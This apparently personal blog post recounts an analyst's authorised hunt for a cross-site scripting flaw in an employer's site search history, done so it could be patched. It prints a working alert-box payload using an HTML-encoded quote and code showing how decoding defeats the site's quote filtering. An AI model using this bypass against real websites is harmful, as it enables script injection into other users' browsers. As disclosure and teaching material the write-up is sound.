How I found my first Cross-Site Scripting Vulnerability

Shellbr3ak
3 min read · May 19, 2021


Hello all, this is Shellbr3ak, back again with another story of a bug I found outside of CTF challenges.

Since this vulnerability was found on a real website, I won’t mention the domain it was found on; I’ll use https://example.com to refer to the vulnerable website. Enough talking, let’s get started.

After I started working as a threat intelligence analyst, my boss knew I was interested in web penetration testing and had some knowledge of it. A threat actor was selling a Cross-Site Scripting vulnerability in one of our websites on a black market, so he asked me to find it ourselves, so we could patch it before any other malicious actors bought and exploited it.

On my first day, I started looking for input boxes to fuzz, and I found a search functionality that takes input from the user and keeps past search queries in the response page as a search history. While scanning the website, I noticed in the Network tab of the developer tools that requests were being sent to a file called xss.js, so I viewed that JavaScript file: 1200 lines of code.

At that moment I thought it would be impossible to find an XSS on a website that ships this much code just to prevent XSS. Still, I figured it wouldn’t hurt to try.

So I started deep-scanning the search functionality mentioned above, entering random values to see how the app would behave, and I noticed that when I entered URL-encoded or HTML-encoded values, the app decoded them.
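The decoding behavior can be sketched like this (a minimal reproduction of what I observed; the helper names are my own illustration, not the site’s actual code):

```javascript
// Sketch of the decoding the search feature appeared to apply to
// submitted queries. These helpers are my own illustration of the
// observed behavior, not the site's code.

// URL decoding: %27 turns back into a single quote.
function urlDecode(input) {
  return decodeURIComponent(input);
}

// A tiny HTML-entity decoder covering the entities relevant here.
function htmlDecode(input) {
  const entities = {
    "&amp;": "&",
    "&lt;": "<",
    "&gt;": ">",
    "&quot;": '"',
    "&apos;": "'",
  };
  return input.replace(/&(amp|lt|gt|quot|apos);/g, (m) => entities[m]);
}

console.log(urlDecode("%27hello"));     // 'hello
console.log(htmlDecode("&apos;hello")); // 'hello
```

Either way, an encoded single quote submitted by the user comes back as a literal single quote, which is the detail the rest of this story hinges on.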

Again, the search queries were rendered in the response body, in a “search history” section, so if a user wanted to re-use one of them, they could just click the newly added search query and a request would be sent to the server.

This is where I confirmed that my input was being decoded, whether it was URL-encoded or HTML-encoded. I used the browser’s developer tools to inspect those search queries, and they were added as <a> tags with an “onclick” attribute.

The “onclick” attribute’s value was something like onclick="search_query('USER_INPUT')", so I dropped everything else and started fuzzing again to see how my input would be interpreted.
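Based on what the inspector showed, the history entries seemed to be built roughly like this (a reconstruction: renderHistoryEntry and the exact markup are my assumptions; only the onclick handler calling search_query comes from what I actually saw):

```javascript
// Rough reconstruction of how the search-history entries appeared to be
// built. renderHistoryEntry is a hypothetical name; the onclick handler
// calling search_query(...) is what the inspector actually showed.
function renderHistoryEntry(userInput) {
  return `<a href="#" onclick="search_query('${userInput}')">${userInput}</a>`;
}

console.log(renderHistoryEntry("shoes"));
// <a href="#" onclick="search_query('shoes')">shoes</a>
```

The key detail is that user input lands inside a single-quoted JavaScript string inside an HTML attribute, so one stray single quote is enough to change the meaning of the handler.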

I entered some random values containing single quotes to see if I could break out of the function’s context, but the app was converting the single quote into a typographic (curly) quote, like the quotes in this blog post, rather than the straight single quote used to delimit strings in code.

Then I remembered: the app was decoding HTML-encoded and URL-encoded input. So I tried entering things like %27);alert(1, hoping the “onclick” attribute’s value would become search_query('USER_INPUT');alert(1), but that didn’t work. Next I tried HTML entities instead, so my payload was:

&apos;);alert(1

Then I submitted the request and inspected the newly added <a> element again. Lucky me: the “&apos;” was decoded into a regular single quote that broke out of the function’s context, and “alert(1”
was placed exactly the way I wanted it to be. When I clicked that search query in the search history (as mentioned earlier, the injection point was the “onclick” attribute of the <a> tag), a pop-up box showed up ;) .
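The whole chain can be condensed into a few lines (again a simplified reconstruction of the behavior described above, not the site’s code; I’ve shortened the template slightly for clarity):

```javascript
// Minimal decoder mirroring the observed server-side behavior:
// &apos; becomes a literal single quote.
function htmlDecode(input) {
  return input.replace(/&apos;/g, "'");
}

// The submitted payload: the single quote is HTML-encoded so it survives
// the app's quote filtering, and the server decodes it afterwards.
const payload = "&apos;);alert(1";

const decoded = htmlDecode(payload);
console.log(decoded); // ');alert(1

// Embedded into the onclick template, the decoded quote closes
// search_query's string argument, and the template's own closing
// parenthesis completes alert(1). (Simplified: trailing characters
// of the real template are omitted for clarity.)
const onclickValue = "search_query('" + decoded + ")";
console.log(onclickValue); // search_query('');alert(1)
```

In short, the filter blocked raw single quotes but ran after (or without accounting for) the entity decoding, so an encoded quote slipped through and was reconstituted right inside an executable attribute.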

I was as happy as never before, since this was my first XSS bug in real life.

Then I wrote a simple report, sent it to my team leader, and contacted the responsible team to patch it :).

So, that was the story. I hope you guys liked it, and I’ll see you all in the next write-up.


Shellbr3ak

Offensive Security Engineer | Threat Intelligence Analyst | Cloud/Web App Penetration Tester | CTIA | eWPTXv2 | OSWE | CTF Lover